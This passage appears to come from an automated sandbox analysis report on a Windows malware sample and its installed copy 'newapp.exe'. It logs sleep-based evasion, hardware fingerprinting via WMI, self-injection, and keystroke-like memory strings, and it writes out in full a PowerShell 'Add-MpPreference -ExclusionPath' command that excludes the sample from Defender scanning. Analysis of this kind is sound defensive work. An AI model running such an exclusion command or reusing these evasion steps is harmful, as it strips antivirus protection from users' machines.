                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -594906s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -594797s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -594672s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -594562s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -594453s >= -30000s
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 599812Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 599664Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 599365Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 599234Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 599123Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 599015Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598906Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598797Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598687Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598578Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598469Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598344Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598234Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598125Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 598015Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597906Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597797Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597687Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597578Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597468Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597358Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597250Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597140Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 597029Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596915Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596801Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596672Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596562Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596453Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596343Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596233Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596125Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 596015Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595906Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595797Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595687Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595578Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595468Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595359Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595250Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595140Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 595031Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594919Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594797Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594687Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594576Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594468Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594329Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594207Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeThread delayed: delay time: 594078Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599781Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599453Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599341Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599110Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598988Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598860Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598735Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598610Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598485Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598360Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598235Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598110Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597985Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597860Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597735Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597625Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597485Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597375Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597266Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597141Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597031Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596906Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596797Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596687Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596563Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596453Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596344Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596232Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596125Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596016Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595906Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595797Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595687Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595578Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595469Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595359Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595250Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595141Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595016Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594891Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594781Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594672Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594450Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594338Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599888
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599781
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599672
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599562
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599453
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599343
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599218
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599109
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598999
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598834
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598685
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598578
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598468
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598358
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598250
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598140
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598031
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597920
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597812
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597703
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597593
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597484
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597375
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597265
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597155
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597046
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596937
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596828
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596718
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596609
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596500
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596390
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596280
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596121
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596015
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595906
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595797
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595672
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595562
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595453
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595343
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595234
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595125
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595015
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594906
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594797
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594672
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594562
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594453
                      Source: iNFGd6bDZX.exe, 00000000.00000002.1726457785.0000000003EA1000.00000004.00000800.00020000.00000000.sdmp, iNFGd6bDZX.exe, 00000000.00000002.1731244450.0000000009710000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: faBeSpqeMu
                      Source: newapp.exe, 0000000E.00000002.2920974960.0000000000F57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                      Source: iNFGd6bDZX.exe, 00000005.00000002.2923279667.00000000017CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
                      Source: newapp.exe, 0000000A.00000002.2954066847.0000000005E80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe"
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeMemory written: C:\Users\user\Desktop\iNFGd6bDZX.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iNFGd6bDZX.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeProcess created: C:\Users\user\Desktop\iNFGd6bDZX.exe "C:\Users\user\Desktop\iNFGd6bDZX.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
                      Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.00000000034BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.00000000034BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q9<b>[ Program Manager]</b> (11/01/2025 11:05:13)<br>{Win}rTHcqd$L
                      Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.00000000034BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q
                      Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.00000000034BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q8<b>[ Program Manager]</b> (11/01/2025 11:05:13)<br>{Win}THcqd$L
                      Source: iNFGd6bDZX.exe, 00000005.00000002.2927556251.00000000034BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q3<b>[ Program Manager]</b> (11/01/2025 11:05:13)<br>
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Users\user\Desktop\iNFGd6bDZX.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
